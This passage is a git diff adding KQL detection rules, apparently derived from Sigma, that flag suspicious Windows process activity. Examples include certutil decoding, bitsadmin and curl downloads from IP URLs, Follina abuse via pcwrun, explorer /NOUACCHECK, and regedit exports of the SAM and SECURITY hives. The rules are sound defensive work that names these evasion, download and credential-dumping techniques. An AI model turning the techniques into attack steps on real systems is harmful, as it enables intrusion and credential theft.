+++ b/KQL/rules/windows/process_creation/execute_from_alternate_data_streams.kql @@ -0,0 +1,10 @@ +// Title: Execute From Alternate Data Streams +// Author: frack113 +// Date: 2021-09-01 +// Level: medium +// Description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 + +DeviceProcessEvents +| where ProcessCommandLine contains "txt:" and ((ProcessCommandLine contains "esentutl " and ProcessCommandLine contains " /y " and ProcessCommandLine contains " /d " and ProcessCommandLine contains " /o ") or (ProcessCommandLine contains "makecab " and ProcessCommandLine contains ".cab") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains " export ") or (ProcessCommandLine contains "regedit " and ProcessCommandLine contains " /E ") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > ")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/execute_pcwrun_exe_to_leverage_follina.kql b/KQL/rules/windows/process_creation/execute_pcwrun_exe_to_leverage_follina.kql new file mode 100644 index 00000000..f1cd71f7 --- /dev/null +++ b/KQL/rules/windows/process_creation/execute_pcwrun_exe_to_leverage_follina.kql @@ -0,0 +1,12 @@ +// Title: Execute Pcwrun.EXE To Leverage Follina +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-13 +// Level: high +// Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "../" and FolderPath endswith "\\pcwrun.exe" \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/execution_of_non_existing_file.kql b/KQL/rules/windows/process_creation/execution_of_non_existing_file.kql new file mode 100644 index 00000000..1e12eb9f --- /dev/null +++ b/KQL/rules/windows/process_creation/execution_of_non_existing_file.kql @@ -0,0 +1,10 @@ +// Title: Execution Of Non-Existing File +// Author: Max Altgelt (Nextron Systems) +// Date: 2021-12-09 +// Level: high +// Description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (not(FolderPath contains "\\")) and (not((((FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or (ProcessCommandLine in~ ("Registry", "MemCompression", "vmmem"))) or (FolderPath in~ ("-", "")) or isnull(FolderPath)))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/execution_of_powershell_script_in_public_folder.kql b/KQL/rules/windows/process_creation/execution_of_powershell_script_in_public_folder.kql new file mode 100644 index 00000000..06c1acc2 --- /dev/null +++ b/KQL/rules/windows/process_creation/execution_of_powershell_script_in_public_folder.kql 
@@ -0,0 +1,12 @@ +// Title: Execution of Powershell Script in Public Folder +// Author: Max Altgelt (Nextron Systems) +// Date: 2022-04-06 +// Level: high +// Description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "-f C:\\Users\\Public" or ProcessCommandLine contains "-f \"C:\\Users\\Public" or ProcessCommandLine contains "-f %Public%" or ProcessCommandLine contains "-fi C:\\Users\\Public" or ProcessCommandLine contains "-fi \"C:\\Users\\Public" or ProcessCommandLine contains "-fi %Public%" or ProcessCommandLine contains "-fil C:\\Users\\Public" or ProcessCommandLine contains "-fil \"C:\\Users\\Public" or ProcessCommandLine contains "-fil %Public%" or ProcessCommandLine contains "-file C:\\Users\\Public" or ProcessCommandLine contains "-file \"C:\\Users\\Public" or ProcessCommandLine contains "-file %Public%") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/execution_of_suspicious_file_type_extension.kql b/KQL/rules/windows/process_creation/execution_of_suspicious_file_type_extension.kql new file mode 100644 index 00000000..0b080057 --- /dev/null +++ b/KQL/rules/windows/process_creation/execution_of_suspicious_file_type_extension.kql 
@@ -0,0 +1,11 @@ +// Title: Execution of Suspicious File Type Extension +// Author: Max Altgelt (Nextron Systems) +// Date: 2021-12-09 +// Level: medium +// Description: Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. +// This rule might require some initial baselining to align with some third party tooling in the user environment. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (not((FolderPath endswith ".bin" or FolderPath endswith ".cgi" or FolderPath endswith ".com" or FolderPath endswith ".exe" or FolderPath endswith ".scr" or FolderPath endswith ".tmp"))) and (not((FolderPath contains ":\\$Extend\\$Deleted\\" or FolderPath contains ":\\Windows\\System32\\DriverStore\\FileRepository\\" or (FolderPath in~ ("-", "")) or (FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or FolderPath contains ":\\Windows\\Installer\\MSI" or (FolderPath contains ":\\Config.Msi\\" and (FolderPath endswith ".rbf" or FolderPath endswith ".rbs")) or isnull(FolderPath) or (InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\")))) and (not((InitiatingProcessFolderPath contains ":\\ProgramData\\Avira\\" or (FolderPath endswith "com.docker.service" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe") or FolderPath contains ":\\Program Files\\Mozilla Firefox\\" or FolderPath endswith "\\LZMA_EXE" or (FolderPath endswith ":\\Program Files (x86)\\MyQ\\Server\\pcltool.dll" or FolderPath endswith ":\\Program Files\\MyQ\\Server\\pcltool.dll") or (FolderPath contains "NVIDIA\\NvBackend\\" and FolderPath endswith ".dat") or ((FolderPath contains ":\\Program Files (x86)\\WINPAKPRO\\" or FolderPath contains ":\\Program Files\\WINPAKPRO\\") and FolderPath endswith ".ngn") or (FolderPath 
contains "\\AppData\\Local\\Packages\\" and FolderPath contains "\\LocalState\\rootfs\\")))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/execution_via_stordiag_exe.kql b/KQL/rules/windows/process_creation/execution_via_stordiag_exe.kql new file mode 100644 index 00000000..7ae58432 --- /dev/null +++ b/KQL/rules/windows/process_creation/execution_via_stordiag_exe.kql @@ -0,0 +1,12 @@ +// Title: Execution via stordiag.exe +// Author: Austin Songer (@austinsonger) +// Date: 2021-10-21 +// Level: high +// Description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage of stordiag.exe. + +DeviceProcessEvents +| where ((FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\fltmc.exe") and InitiatingProcessFolderPath endswith "\\stordiag.exe") and (not((InitiatingProcessFolderPath startswith "c:\\windows\\system32\\" or InitiatingProcessFolderPath startswith "c:\\windows\\syswow64\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/execution_via_workfolders_exe.kql b/KQL/rules/windows/process_creation/execution_via_workfolders_exe.kql new file mode 100644 index 00000000..969d8c96 --- /dev/null +++ b/KQL/rules/windows/process_creation/execution_via_workfolders_exe.kql 
@@ -0,0 +1,12 @@ +// Title: Execution via WorkFolders.exe +// Author: Maxime Thiebaut (@0xThiebaut) +// Date: 2021-10-21 +// Level: high +// Description: Detects using WorkFolders.exe to execute an arbitrary control.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage of the uncommon Windows Work Folders feature. + +DeviceProcessEvents +| where (FolderPath endswith "\\control.exe" and InitiatingProcessFolderPath endswith "\\WorkFolders.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\control.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/explorer_nouaccheck_flag.kql b/KQL/rules/windows/process_creation/explorer_nouaccheck_flag.kql new file mode 100644 index 00000000..984523a4 --- /dev/null +++ b/KQL/rules/windows/process_creation/explorer_nouaccheck_flag.kql @@ -0,0 +1,13 @@ +// Title: Explorer NOUACCHECK Flag +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-23 +// Level: high +// Description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 +// False Positives: +// - Domain Controller User Logon +// - Unknown how many legitimate software products use that method + +DeviceProcessEvents +| where (ProcessCommandLine contains "/NOUACCHECK" and FolderPath endswith "\\explorer.exe") and (not((InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/explorer_process_tree_break.kql b/KQL/rules/windows/process_creation/explorer_process_tree_break.kql new file mode 100644 index 00000000..0312650f --- /dev/null 
+++ b/KQL/rules/windows/process_creation/explorer_process_tree_break.kql @@ -0,0 +1,11 @@ +// Title: Explorer Process Tree Break +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber +// Date: 2019-06-29 +// Level: medium +// Description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, +// which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where ProcessCommandLine contains "/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}" or (ProcessCommandLine contains "explorer.exe" and (ProcessCommandLine contains " -root," or ProcessCommandLine contains " /root," or ProcessCommandLine contains " –root," or ProcessCommandLine contains " —root," or ProcessCommandLine contains " ―root,")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/exports_critical_registry_keys_to_a_file.kql b/KQL/rules/windows/process_creation/exports_critical_registry_keys_to_a_file.kql new file mode 100644 index 00000000..4590dfd7 --- /dev/null +++ b/KQL/rules/windows/process_creation/exports_critical_registry_keys_to_a_file.kql 
@@ -0,0 +1,12 @@ +// Title: Exports Critical Registry Keys To a File +// Author: Oddvar Moe, Sander Wiebing, oscd.community +// Date: 2020-10-12 +// Level: high +// Description: Detects the export of a crital Registry key to a file. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.discovery, attack.t1012 +// False Positives: +// - Dumping hives for legitimate purpouse i.e. backup or forensic investigation + +DeviceProcessEvents +| where (ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E " or ProcessCommandLine contains " –E " or ProcessCommandLine contains " —E " or ProcessCommandLine contains " ―E ") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/exports_registry_key_to_a_file.kql b/KQL/rules/windows/process_creation/exports_registry_key_to_a_file.kql new file mode 100644 index 00000000..f86b39b8 --- /dev/null +++ b/KQL/rules/windows/process_creation/exports_registry_key_to_a_file.kql 
@@ -0,0 +1,12 @@ +// Title: Exports Registry Key To a File +// Author: Oddvar Moe, Sander Wiebing, oscd.community +// Date: 2020-10-07 +// Level: low +// Description: Detects the export of the target Registry key to a file. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.discovery, attack.t1012 +// False Positives: +// - Legitimate export of keys + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E " or ProcessCommandLine contains " –E " or ProcessCommandLine contains " —E " or ProcessCommandLine contains " ―E ") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security")))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/file_and_subfolder_enumeration_via_dir_command.kql b/KQL/rules/windows/process_creation/file_and_subfolder_enumeration_via_dir_command.kql new file mode 100644 index 00000000..a359dd25 --- /dev/null +++ b/KQL/rules/windows/process_creation/file_and_subfolder_enumeration_via_dir_command.kql 
@@ -0,0 +1,12 @@ +// Title: File And SubFolder Enumeration Via Dir Command +// Author: frack113 +// Date: 2021-12-13 +// Level: low +// Description: Detects usage of the "dir" command part of Windows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1217 +// False Positives: +// - Likely + +DeviceProcessEvents +| where (ProcessCommandLine =~ "*dir*-s*" or ProcessCommandLine =~ "*dir*/s*" or ProcessCommandLine =~ "*dir*–s*" or ProcessCommandLine =~ "*dir*—s*" or ProcessCommandLine =~ "*dir*―s*") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/file_decoded_from_base64_hex_via_certutil_exe.kql b/KQL/rules/windows/process_creation/file_decoded_from_base64_hex_via_certutil_exe.kql new file mode 100644 index 00000000..92b81623 --- /dev/null +++ b/KQL/rules/windows/process_creation/file_decoded_from_base64_hex_via_certutil_exe.kql 
@@ -0,0 +1,10 @@ +// Title: File Decoded From Base64/Hex Via Certutil.EXE +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2023-02-15 +// Level: high +// Description: Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where (ProcessCommandLine contains "-decode " or ProcessCommandLine contains "/decode " or ProcessCommandLine contains "–decode " or ProcessCommandLine contains "—decode " or ProcessCommandLine contains "―decode " or ProcessCommandLine contains "-decodehex " or ProcessCommandLine contains "/decodehex " or ProcessCommandLine contains "–decodehex " or ProcessCommandLine contains "—decodehex " or ProcessCommandLine contains "―decodehex ") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/file_decryption_using_gpg4win.kql b/KQL/rules/windows/process_creation/file_decryption_using_gpg4win.kql new file mode 100644 index 00000000..c701334d --- /dev/null +++ b/KQL/rules/windows/process_creation/file_decryption_using_gpg4win.kql @@ -0,0 +1,10 @@ +// Title: File Decryption Using Gpg4win +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-09 +// Level: medium +// Description: Detects usage of Gpg4win to decrypt files +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine contains " -d " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/file_deletion_via_del.kql b/KQL/rules/windows/process_creation/file_deletion_via_del.kql new file mode 100644 index 00000000..69bf76f7 --- /dev/null +++ b/KQL/rules/windows/process_creation/file_deletion_via_del.kql @@ -0,0 +1,15 @@ +// Title: File Deletion Via Del +// Author: frack113 +// Date: 2022-01-15 +// Level: low +// Description: Detects execution of the builtin "del"/"erase" commands in order to delete files. +// Adversaries may delete files left behind by the actions of their intrusion activity. +// Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. +// Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 +// False Positives: +// - False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains " -f" or ProcessCommandLine contains " /f" or ProcessCommandLine contains " –f" or ProcessCommandLine contains " —f" or ProcessCommandLine contains " ―f" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s" or ProcessCommandLine contains " -q" or ProcessCommandLine contains " /q" or ProcessCommandLine contains " –q" or ProcessCommandLine contains " —q" or ProcessCommandLine contains " ―q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/file_download_and_execution_via_ieexec_exe.kql b/KQL/rules/windows/process_creation/file_download_and_execution_via_ieexec_exe.kql new file mode 100644 index 00000000..d208417f --- /dev/null +++ b/KQL/rules/windows/process_creation/file_download_and_execution_via_ieexec_exe.kql @@ -0,0 +1,10 @@ +// Title: File Download And Execution Via IEExec.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-16 +// Level: high +// Description: Detects execution of the IEExec utility to download and execute files +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IEExec.exe" or ProcessVersionInfoOriginalFileName =~ "IEExec.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/file_download_from_browser_process_via_inline_url.kql b/KQL/rules/windows/process_creation/file_download_from_browser_process_via_inline_url.kql new file mode 100644 index 00000000..2ec8624d --- /dev/null +++ b/KQL/rules/windows/process_creation/file_download_from_browser_process_via_inline_url.kql 
@@ -0,0 +1,10 @@ +// Title: File Download From Browser Process Via Inline URL +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-11 +// Level: medium +// Description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where ((ProcessCommandLine endswith ".7z" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".txt" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".zip") or (ProcessCommandLine contains ".7z\"" or ProcessCommandLine contains ".dat\"" or ProcessCommandLine contains ".dll\"" or ProcessCommandLine contains ".hta\"" or ProcessCommandLine contains ".ps1\"" or ProcessCommandLine contains ".psm1\"" or ProcessCommandLine contains ".txt\"" or ProcessCommandLine contains ".vbe\"" or ProcessCommandLine contains ".vbs\"" or ProcessCommandLine contains ".zip\"")) and ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/file_download_from_ip_based_url_via_certoc_exe.kql b/KQL/rules/windows/process_creation/file_download_from_ip_based_url_via_certoc_exe.kql new file mode 100644 index 00000000..94652062 --- /dev/null 
+++ b/KQL/rules/windows/process_creation/file_download_from_ip_based_url_via_certoc_exe.kql @@ -0,0 +1,10 @@ +// Title: File Download From IP Based URL Via CertOC.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-18 +// Level: high +// Description: Detects when a user downloads a file from an IP based URL using CertOC.exe +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.execution, attack.t1105 + +DeviceProcessEvents +| where ProcessCommandLine contains "-GetCACAPS" and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/file_download_from_ip_url_via_curl_exe.kql b/KQL/rules/windows/process_creation/file_download_from_ip_url_via_curl_exe.kql new file mode 100644 index 00000000..74fa57c8 --- /dev/null +++ b/KQL/rules/windows/process_creation/file_download_from_ip_url_via_curl_exe.kql 
@@ -0,0 +1,10 @@
+// Title: File Download From IP URL Via Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-18
+// Level: medium
+// Description: Detects file downloads directly from IP address URL using curl.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}") and (not((ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_using_notepad_gup_utility.kql b/KQL/rules/windows/process_creation/file_download_using_notepad_gup_utility.kql
new file mode 100644
index 00000000..79f3f0e3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_using_notepad_gup_utility.kql
@@ -0,0 +1,12 @@
+// Title: File Download Using Notepad++ GUP Utility
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-10
+// Level: high
+// Description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Other parent processes other than notepad++ using GUP that are not currently identified
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -unzipTo " and ProcessCommandLine contains "http") and (FolderPath endswith "\\GUP.exe" or ProcessVersionInfoOriginalFileName =~ "gup.exe")) and (not(InitiatingProcessFolderPath endswith "\\notepad++.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_using_protocolhandler_exe.kql b/KQL/rules/windows/process_creation/file_download_using_protocolhandler_exe.kql
new file mode 100644
index 00000000..bfa9c152
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_using_protocolhandler_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Download Using ProtocolHandler.exe
+// Author: frack113
+// Date: 2021-07-13
+// Level: medium
+// Description: Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\protocolhandler.exe" or ProcessVersionInfoOriginalFileName =~ "ProtocolHandler.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_via_bitsadmin.kql b/KQL/rules/windows/process_creation/file_download_via_bitsadmin.kql
new file mode 100644
index 00000000..f4f2a035
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_via_bitsadmin.kql
@@ -0,0 +1,12 @@
+// Title: File Download Via Bitsadmin
+// Author: Michael Haag, FPT.EagleEye
+// Date: 2017-03-09
+// Level: medium
+// Description: Detects usage of bitsadmin downloading a file
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+// False Positives:
+// - Some legitimate apps use this, but limited.
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and (ProcessCommandLine contains " /transfer " or ((ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and ProcessCommandLine contains "http"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql b/KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql
new file mode 100644
index 00000000..f2966d71
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql
@@ -0,0 +1,10 @@
+// Title: File Download Via Bitsadmin To A Suspicious Target Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%public%") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql b/KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql
new file mode 100644
index 00000000..dc75d930
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql
@@ -0,0 +1,10 @@
+// Title: File Download Via Bitsadmin To An Uncommon Target Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: medium
+// Description: Detects usage of bitsadmin downloading a file to uncommon target folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_via_certoc_exe.kql b/KQL/rules/windows/process_creation/file_download_via_certoc_exe.kql
new file mode 100644
index 00000000..c568e3e0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_via_certoc_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Download via CertOC.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-16
+// Level: medium
+// Description: Detects when a user downloads a file by using CertOC.exe
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-GetCACAPS" and ProcessCommandLine contains "http") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_via_installutil_exe.kql b/KQL/rules/windows/process_creation/file_download_via_installutil_exe.kql
new file mode 100644
index 00000000..e1383f7d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_via_installutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Download Via InstallUtil.EXE
